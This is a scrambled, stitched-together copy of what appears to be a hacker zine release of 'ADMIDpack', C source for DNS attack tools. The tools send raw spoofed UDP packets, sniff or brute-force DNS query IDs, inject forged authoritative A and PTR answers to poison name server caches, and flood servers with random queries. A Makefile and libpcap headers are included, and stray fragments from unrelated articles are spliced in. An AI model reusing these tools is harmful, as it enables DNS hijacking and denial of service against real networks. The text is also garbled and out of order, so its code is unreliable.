/ non recursive ! */ /* we waiting for awnser ... */ while(1){ } /* end of while loop */ }/* end of proggies */
<-->
<++> ADMIDpack/ADMsnOOfID.c int ETHHDRSIZE; void main(argc, argv)
int argc;
char argv[];
{
struct pcap_pkthdr h;
struct pcap *pcap_d;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv,dnssend;
char *data;
char *data2;
char *buffer;
char namefake[255];
char buffer2[1024];
char ebuf[255];
char spoofname[255];
char spoofip[255];
char bla[255];
char dnstrust[255];
char *alacon;
unsigned long sipns;
unsigned long dip; srand( (time(NULL) % random() * random()) ); if(argc <2){
printf("usage : %s if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
else ETHHDRSIZE = 14; if(argc>5)type=atoi(argv[5]); if(argc > 6)strcpy(spoofname,argv[6]);
else{
printf("enter the name you wanna spoof:");
scanf("%s",spoofname);
} if(argc > 7)strcpy(bla,argv[7]);
else{
printf("enter the ip's of the spoof name:");
scanf("%s",bla);
} alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(spoofip,alacon); if(argc > 8)strcpy(bla,argv[8]);
else{
printf("enter the dns trust for the spoof\n");
scanf("%s",bla);
}
alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(dnstrust,alacon); dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AFINET,SOCKRAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
} if( (setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
} printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION);
printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n");
sleep(1); pcapd = pcapopen_live(argv[1],1024,0,100,ebuf); sipns = host2ip(argv[4]);
dip = host2ip(argv[2]);
con = myrand(); /* make the question for get the ID */ sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]);
dnssend->id = 2600;
dnssend->qr = 0;
dnssend->rd = 1;
dnssend->aa = 0;
dnssend->quenum = htons(1);
dnssend->repnum = htons(0);
i = makepaketQS(data2,namefake,TYPEA);
udpsend(sraw, sipns, dip,2600+con, 53, buffer2, DNSHDRSIZE+i);
printf("Question sended...\n"); while(1)
{
buffer = (uchar *)pcapnext(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == IPPROTOUDP){
printf("[%s:%i ->",inetntoa(ip->saddr),ntohs(udp->source));
printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest));
} } /* well now we have the ID we cant predict the ID */ }
<-->
<++> ADMIDpack/ADMsniffID.c int ETHHDRSIZE; void usage(){
printf("usage : ADMsniffID void main(int argc, char *argv)
{ if(argc <2)usage();
if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
else ETHHDRSIZE = 14; strcpy(SPOOFIP,argv[2]);
strcpy(spoofname,argv[3]);
type = atoi(argv[4]); /* Buffer 'n' tcp/ip stuff */ dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+12); /* bzero(buffer,sizeof(buffer)); */
bzero(bla,sizeof(bla));
bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AFINET,SOCKRAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
} if( (setsockopt(sraw, IPPROTOIP, IPHDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
} /* open pcap descriptor */ pcapd = pcapopen_live(argv[1],sizeof(buffer),0,100,ebuf); printf("ADMsniffID %s (c) ADMnHeike\n",VERSION); while(1){ buffer =(uchar *)pcapnext(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == 17)
if(udp->dest == htons(53) ) } /* end of while(1) /
} / The End !! ;) */
<-->
<++> ADMIDpack/Makefile SHELL = /bin/sh #
CC = gcc
LIBS = -lpcap
BIN = .
CFLAGS = -I. -L. ADMkillDNS: ADMkillDNS.c
$(CC) $(CFLAGS) ADMkillDNS.c $(LIBS) -o $(BIN)/ADMkillDNS ADMsnOOfID: ADMsnOOfID.c
$(CC) $(CFLAGS) ADMsnOOfID.c $(LIBS) -o $(BIN)/ADMsnOOfID ADMsniffID: ADMsniffID.c
$(CC) $(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN)/ADMsniffID ADMdnsfuckr: ADMdnsfuckr.c
$(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr ADMnOg00d: ADMnOg00d.c
$(CC) $(CFLAGS) ADMnOg00d.c $(LIBS) -o $(BIN)/ADMnOg00d clean:
rm -f $(BIN)/o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \
$(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr
<-->
<++> ADMIDpack/bpf.h
/-
* Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* This code is derived from the Stanford/CMU enet packet filter,
* (net/enet.c) distributed as part of 4.3BSD, and code contributed
* to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
* Berkeley Laboratory.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the University of
* California, Berkeley and its contributors.
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#)bpf.h 7.1 (Berkeley) 5/7/91
*
* @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
*/ /* BSD style release date */ typedef int bpfint32;
typedef uint bpfuint32; /*
* Alignment macros. BPFWORDALIGN rounds up to the next
* even multiple of BPFALIGNMENT.
*/ /*
* Structure for BIOCSETF.
*/
struct bpfprogram {
uint bflen;
struct bpfinsn *bf_insns;
}; /*
* Struct returned by BIOCGSTATS.
/
struct bpf_stat {
u_int bs_recv; / number of packets received /
u_int bs_drop; / number of packets dropped */
}; /*
* Struct return by BIOCVERSION. This represents the version number of
* the filter language described by the instruction encodings below.
* bpf understands a program iff kernelmajor == filtermajor &&
* kernelminor >= filterminor, that is, if the value returned by the
* running kernel has the same major number and a minor number equal
* equal to or less than the filter being downloaded. Otherwise, the
* results are undefined, meaning an error may be returned or packets
* may be accepted haphazardly.
* It has nothing to do with the source code version.
/
struct bpf_version {
u_short bv_major;
u_short bv_minor;
};
/ Current version number of filter architecture. */ /*
* BPF ioctls
*
* The first set is for compatibility with Sun's pcc style
* header files. If your using gcc, we assume that you
* have run fixincludes so the latter set should work.
*/ /*
* Structure prepended to each packet.
/
struct bpf_hdr {
struct timeval bh_tstamp; / time stamp /
bpf_u_int32 bh_caplen; / length of captured portion /
bpf_u_int32 bh_datalen; / original length of packet /
u_short bh_hdrlen; / length of bpf header (this struct
plus alignment padding) /
};
/
* Because the structure above is not a multiple of 4 bytes, some compilers
* will insist on inserting padding; hence, sizeof(struct bpfhdr) won't work.
* Only the kernel needs to know about it; applications use bhhdrlen.
*/ /*
* Data-link level type codes.
*/ /*
* The instruction encondings.
/
/ instruction classes */ /* ld/ldx fields */ /* alu/jmp fields */ /* ret - BPFK and BPFX also apply */ /* misc */ /*
* The instruction data structure.
*/
struct bpfinsn {
ushort code;
uchar jt;
uchar jf;
bpf_int32 k;
}; /*
* Macros for insn array initializers.
*/ extern uint bpffilter();
extern void bpfattach();
extern void bpftap();
extern void bpfmtap(); extern uint bpffilter(struct bpfinsn *, uchar *, uint, uint); /*
* Number of scratch memory words (for BPFLD|BPFMEM and BPF_ST).
*/ <-->
<++> ADMIDpack/dns.h struct dnshdr {
unsigned short int id; unsigned char rd:1; /* recursion desired /
unsigned char tc:1; / truncated message /
unsigned char aa:1; / authoritive answer /
unsigned char opcode:4; / purpose of message /
unsigned char qr:1; / response flag */ unsigned char rcode:4; /* response code /
unsigned char unused:2; / unused bits /
unsigned char pr:1; / primary server required (non standard) /
unsigned char ra:1; / recursion available */ unsigned short int quenum;
unsigned short int repnum;
unsigned short int numrr;
unsigned short int numrrsup;
};
<-->
<++> ADMIDpack/ip.h /* adapted from tcpdump */ #define IPVERSION 4 struct iphdr {
uchar ihl:4, /* header length */
version:4; /* version */
uchar tos; /* type of service /
short tot_len; / total length /
u_short id; / identification /
short off; / fragment offset field */ uchar ttl; /* time to live */
uchar protocol; /* protocol /
u_short check; / checksum /
struct in_addr saddr, daddr; / source and dest address */
}; #define IP_MAXPACKET 65535 <-->
<++> ADMIDpack/pcap.h
/*
* Copyright (c) 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the Computer Systems
* Engineering Group at Lawrence Berkeley Laboratory.
* 4. Neither the name of the University nor of the Laboratory may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
*/ /*
* Compatibility for systems that have a bpf.h that
* predates the bpf typedefs for 64-bit support.
*/ typedef int bpfint32;
typedef uint bpfuint32; typedef struct pcap pcapt;
typedef struct pcapdumper pcapdumpert; /*
* The first record in the file contains saved values for some
* of the flags used in the printout phases of tcpdump.
* Many fields here are 32 bit ints so compilers won't insert unwanted
* padding; these files need to be interchangeable across architectures.
/
struct pcap_file_header {
bpf_u_int32 magic;
u_short version_major;
u_short version_minor;
bpf_int32 thiszone; / gmt to local correction /
bpf_u_int32 sigfigs; / accuracy of timestamps /
bpf_u_int32 snaplen; / max length saved portion of each pkt /
bpf_u_int32 linktype; / data link type (DLT_*) */
}; /*
* Each packet in the dump file is prepended with this generic header.
* This gets around the problem of different headers for different
* packet interfaces.
/
struct pcap_pkthdr {
struct timeval ts; / time stamp /
bpf_u_int32 caplen; / length of portion present /
bpf_u_int32 len; / length this packet (off wire) */
}; /*
* As returned by the pcapstats()
*/
struct pcapstat {
uint psrecv; /* number of packets received /
u_int ps_drop; / number of packets dropped /
u_int ps_ifdrop; / drops by interface XXX not yet supported */
}; typedef void (*pcaphandler)(uchar *, const struct pcappkthdr *,
const uchar *); char pcap_lookupdev(char *);
int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t *pcap_open_live(char *, int, int, int, char *);
pcap_t *pcap_open_offline(const char *, char *);
void pcap_close(pcap_t *);
int pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char
pcapnext(pcapt , struct pcap_pkthdr *);
int pcap_stats(pcap_t *, struct pcap_stat *);
int pcap_setfilter(pcap_t *, struct bpf_program *);
void pcap_perror(pcap_t *, char *);
char *pcap_strerror(int);
char *pcap_geterr(pcap_t *);
int pcap_compile(pcap_t *, struct bpf_program *, char *, int,
bpf_u_int32);
/ XXX */
int pcapfreecode(pcapt *, struct bpfprogram *);
int pcapdatalink(pcapt *);
int pcapsnapshot(pcapt *);
int pcapisswapped(pcapt *);
int pcapmajorversion(pcapt *);
int pcapminorversion(pcapt *); /* XXX */
FILE *pcapfile(pcapt *);
int pcapfileno(pcapt *); pcapdumpert *pcapdumpopen(pcapt *, const char *);
void pcapdumpclose(pcapdumpert *);
void pcapdump(uchar *, const struct pcappkthdr *, const u_char *); /* XXX this guy lives in the bpf tree */
uint bpffilter(struct bpfinsn *, uchar *, uint, uint);
char *bpfimage(struct bpfinsn *, int); <-->
<++> ADMIDpack/udp.h
struct udphdr {
ushort source; /* source port */
ushort dest; /* destination port /
u_short len; / udp length /
u_short check; / udp checksum */
};
<--> ----[ EOF :----------------------------:
Siemens Chip Card Technology
. by Yggdrasil .
:----------------------------:
+------------------------+ +------------------+
| Address Counter | --> | Column Decoder |
+------------------------+ +------------------+
^ | | 16
| v v
+-----------+ +---------+ +------------------+
Frame counter 64 352-415 Yes Yes [cfg]
0 0 Secret ROM Yes No
0 1 R.O.M. Yes No
1 0 Secret PROM U.C. U.C.
1 1 P.R.O.M. U.C. U.C.
This code can be modified provided that the fuse was not fused, while the
error counter value can be modified even if the fuse was fused... "I am for ever walking upon these shores,
betwixt the sand and the foam.
The high tide will erase my foot-prints,
and the wind will blow away the foam.
But the sea and the shore will remain
For ever."
-- Gibran K. Gibran
presents DNS ID Hacking
4 bits 3 bits (always 0)
| |
| |
here we put the IP for example (at least in our case)>> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT
at this time named daemon is out of order :)
############### Windows ID Vulnerability
################## BIND Vulnerability
####################################################################
define IPHDRSIZE sizeof(struct iphdr)
define UDPHDRSIZE sizeof(struct udphdr)
include
include
include
include
include
include
include
include
include
include
include
include "ip.h"
include "udp.h"
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
int s;
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
char * datagram;
unsigned datasize;
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(UDPHDRSIZE+datasize);
udp->check = 0;
memcpy(data,datagram,datasize);
memset(packet,0,IPHDRSIZE);
ip->saddr.s_addr = saddr;
ip->daddr.s_addr = daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 245;
ip->id = random()%5985;
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
ip->check = 0;
ip->check = in_cksum((char *)packet,IPHDRSIZE);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=daddr;
sin.sin_port=udp->dest;
x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
(struct sockaddr*)&sin, sizeof(struct sockaddr));
<-->
<++> ADMIDpack/ADMDNS2.c
/***************/
/ DNS include for play with DNS packet (c) ADM /
/****************/define ERROR -1
define DNSHDRSIZE 12
define TYPE_A 1
define TYPE_PTR 12
i=strlen(data)+5;
strcpy(data+i,data);
i=i+strlen(data)+1;
*((ushort *) (data+i)) = htons(TYPEA);
*((ushort *) (data+i+2)) = htons(1);
*((ulong *) (data+i+4)) = 9999999;
*((ushort *) (data+i+8)) = htons(4);
*((u_long *) (data+i+10)) = host2ip(ip);
return(i+14);
}
i=strlen(data)+5;
strcpy((data+i),data);
i=(i+strlen(data)+1);
*((ushort *) (data+i)) = htons(TYPEPTR);
*((ushort *) (data+i+2)) = htons(1);
*((ulong *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(strlen(tmp)+1);
strcpy((data+i+10),tmp);
return(i+10+strlen(tmp)+1);
}
}
} dns = (struct dnshdr *)buff;
data = (char *)(buff+DNSHDRSIZE);
trustip = host2ip(dnstrust);
victimip = host2ip(victim);
fakeip = host2ip("12.1.1.0");
/* send question ... */
/* now its time to awnser Quickly !!! */
for(rere = 0; rere < 2;rere++){
for(loop=0;loop < 80;loop++){
printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n",
dnstrust,victim,spoofname,spoofip,ID+loop,type);
sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type);
}
}
}
define DNSHDRSIZE 12
define VERSION "0.2 pub"
define ERROR -1
include
include
include "ADM-spoof.c"
include "dns.h"
include "ADMDNS2.c"
unsigned long sip;
unsigned long dip;
int sraw,on=1; dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);
while(1){
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
printf("%s\n",namez);
strcpy(data,namez);
*( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
*( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
}
include "ADM-spoof.c"
include "dns.h"
include "ADMDNS2.c"
define ERROR -1
define VERSION "0.3 pub"
define ID_START 1
define ID_STOP 65535
define PORT_START 53
define PORT_STOP 54
struct dnshdr *dns;
char *data;
char buffer2[4000];
unsigned char namez[255];
unsigned long s_ip,s_ip2;
unsigned long d_ip,d_ip2;
int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop;
sip=ntohl(sip);
sip++;
sip=htonl(s_ip); }
printf("plz enter the number of packet u wanna send\n");
scanf("%i",&i);
for(x=0;x<i;x++){
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
strcpy(data,namez);
*( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
*( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
printf("send packet num %i:%i\n",x,i);
}
} /* end of DNS DOS */
for(;idstart<idstop;idstart++){
dns->id = htons(idstart);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop);
i=makepaketAW(data,argv[3],argv[4],TYPE_A);
for(;x < portstop; x++)
udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i);
x = portstart;
}
include
include
include "dns.h"
include "ADM-spoof.c"
include "ADMDNS2.c"
define VERSION "0.7 pub"
define SPOOFIP "4.4.4.4"
define ERROR -1
define LEN sizeof(struct sockaddr)
define UNDASPOOF "111.111.111.111"
define TIMEOUT 300
define DNSHDRSIZE 12
dns->id = htons(ID);
dns->qr = 0;
dns->rd = 0; /* dont want the recusion !! */
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i=makepaketQS(data,wwwname,TYPE_A);
senddnspkt(s,d_ip,wwwname,NULL,dns);
unsigned long sip, sip2;
unsigned long dip, dip2, trust;
unsigned int DAID = 65535, loop = 65535;
int sraw, s_r, i, on=1, x, ID,timez;
int len = sizeof(struct sockaddr); sprintf(fakename,"%i%i%i%i%i%i.%s",
myrand(),
myrand(),
myrand(),
myrand(),
myrand(),
myrand(),
argv[3]);
sendquestion(s_ip,d_ip,fakename,TYPE_A);
/* end of question packet */
bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
bzero(namez,sizeof(namez));
i=0;
x=0;
i=makepaketAW(data,fakename,SPOOFIP,TYPE_A);
udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i);
}
for(timez=0;timez < TIMEOUT; timez++){
if( recvfrom(sr,buffer,sizeof(buffer),0,(struct sockaddr *)&sinrcp,&len) != -1 )
{
printf("ok whe have the reponse ;)\n");
timez = 0;
break;
}
usleep(10);
timez++;
}
if(timez != 0){
printf("hum no reponse from the NS ressend question..\n");
dnsqsnord(sr,dip2,fakename,myrand());
}
else break;
}
/* ok we have a awnser */
printf("fakename = %s\n",fakename);
if(sinrcp.sinaddr.saddr == dip2 )
if(sinrcp.sinport == htons(53) )
{
if( dnsrecv->qr == 1 )
if( dnsrecv->repnum == 0 ) /* hum we dont have found the right ID */
printf("try %i < ID < %i \n",ID-10,ID); else{
/* Hoho we have the spoof has worked we have found the right ID ! */
printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop);
printf("let's send the spoof...\n");
dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5]));
printf("spoof sended ...\n");
exit(0);
}
} /* end of if (sin_rcp.sin_port == htons(53) ) */
bzero(buffer,sizeof(buffer));
include "ADM-spoof.c"
include "dns.h"
include "ADMDNS2.c"
include
include
define DNSHDRSIZE 12
define SPOOF "127.0.0.1"
define VERSION "ver 0.6 pub"
define ERROR -1
int sraw, i, on=1, con, ID,DA_ID,type;
printf("Its Time to w8 \n");if(ip->protocol == 17 )
if(ip->saddr.s_addr == d_ip )
if(ip->daddr.s_addr == s_ipns )
if(udp->dest == htons(53) )
if(dnsrecv->qr == 0 )
{
printf("kewl :)~ we have the packet !\n");
ID = dnsrecv->id ; /* we get the id */
printf("the current id of %s is %d \n",argv[2],ntohs(ID));
DA_ID = ntohs(ID);
printf("send the spoof...\n");
dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type);
printf("spoof sended...\n");
exit(0);
}
include
include "ADM-spoof.c"
include "dns.h"
include "ADMDNS2.c"
define ERROR -1
define DNSHDRSIZE 12
define VERSION "ver 0.4 pub"
struct pcap_pkthdr h;
struct pcap *pcap_d;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv,dnssend;
char *data;
char *data2;
char *buffer;
char SPOOFIP[255];
char bla[255];
char spoofname[255];
char tmp2[255];
char ebuf[255];
char buffer2[1024];
unsigned char namez[255];
int sraw,on=1,tmp1,type;
if(dnsrecv->qr == 0)
{
strcpy(namez,data);
nameformat(namez,bla);
printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla); bzero(bla,sizeof(bla));
printf("the question have the type %i and type of the query %i\n"
,ntohs(*((u_short *)(data+strlen(data)+1)))
,ntohs(*((u_short *)(data+strlen(data)+2+1))));
/* well in diz version we only spoof the type 'A' */
/* check out for a new version in ftp.janova.org/pub/ADM */
printf("make the spoof packet...\n");
printf("dns header\n");
/* here we gonna start to make the spoofed paket :)*/
memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5);
dnssend->id=dnsrecv->id; /* haha the ID ;) */
dnssend->aa=1; /* i've the authority */
dnssend->ra=1; /* i've the recusion */
dnssend->qr=1; /* its a awser */
dnssend->rep_num = htons(1); /* i've one awnser */
printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n"
,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num));
printf("Question..\n");
printf("domainename=%s\n",data2);
printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1))));
printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2))));
if( type == TYPE_PTR){
tmp1=strlen(namez)+5;
strcpy(data2+tmp1,namez);
tmp1=tmp1+strlen(namez)+1;
bzero(tmp2,sizeof(tmp2));
nameformat(spoofname,tmp2);
printf("tmp2 = %s\n",tmp2);
printf(" mouhahahah \n");
*((u_short *)(data2+tmp1)) = htons(TYPE_PTR);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1));
printf("bhaa?.\n");
strcpy((data2+tmp1+2+2+4+2),tmp2);
printf(" ouf !! =) \n");
tmp1 = tmp1 +strlen(tmp2)+ 1;
}
if( type == TYPE_A){
tmp1=strlen(namez)+5;
strcpy(data2+tmp1,namez);
tmp1=tmp1+strlen(namez)+1;
*((u_short *)(data2+tmp1)) = htons(TYPE_A);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(4);
*((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP);
}
printf("Answer..\n");
printf("domainname=%s\n",tmp2);
printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1))));
printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2))));
printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2))));
printf("resource data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4))));
printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));
tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */
/* without the dnshdr */
udp_send(sraw
,ip->daddr
,ip->saddr
,ntohs(udp->dest)
,ntohs(udp->source)
,buffer2
,DNSHDRSIZE+tmp1);
} /* end of the spoof */
version 0.1
/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS
uncomment this if your are not on LinuX
LIBS = -lsocket -lnsl -lpcap
all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00difndef BPFMAJORVERSION
define BPF_RELEASE 199606
define BPFALIGNMENT sizeof(bpfint32)
define BPFWORDALIGN(x) (((x)+(BPFALIGNMENT-1))&~(BPF_ALIGNMENT-1))
define BPF_MAXINSNS 512
define BPF_MAXBUFSIZE 0x8000
define BPF_MINBUFSIZE 32
define BPFMAJORVERSION 1
define BPFMINORVERSION 1
if (defined(sun) || defined(ibm032)) && !defined(GNUC)
define BIOCGBLEN IOR(B,102, uint)
define BIOCSBLEN IOWR(B,102, uint)
define BIOCSETF IOW(B,103, struct bpfprogram)
define BIOCFLUSH _IO(B,104)
define BIOCPROMISC _IO(B,105)
define BIOCGDLT IOR(B,106, uint)
define BIOCGETIF _IOR(B,107, struct ifreq)
define BIOCSETIF _IOW(B,108, struct ifreq)
define BIOCSRTIMEOUT _IOW(B,109, struct timeval)
define BIOCGRTIMEOUT _IOR(B,110, struct timeval)
define BIOCGSTATS IOR(B,111, struct bpfstat)
define BIOCIMMEDIATE IOW(B,112, uint)
define BIOCVERSION IOR(B,113, struct bpfversion)
define BIOCSTCPF IOW(B,114, struct bpfprogram)
define BIOCSUDPF IOW(B,115, struct bpfprogram)
else
define BIOCGBLEN IOR('B',102, uint)
define BIOCSBLEN IOWR('B',102, uint)
define BIOCSETF IOW('B',103, struct bpfprogram)
define BIOCFLUSH _IO('B',104)
define BIOCPROMISC _IO('B',105)
define BIOCGDLT IOR('B',106, uint)
define BIOCGETIF _IOR('B',107, struct ifreq)
define BIOCSETIF _IOW('B',108, struct ifreq)
define BIOCSRTIMEOUT _IOW('B',109, struct timeval)
define BIOCGRTIMEOUT _IOR('B',110, struct timeval)
define BIOCGSTATS IOR('B',111, struct bpfstat)
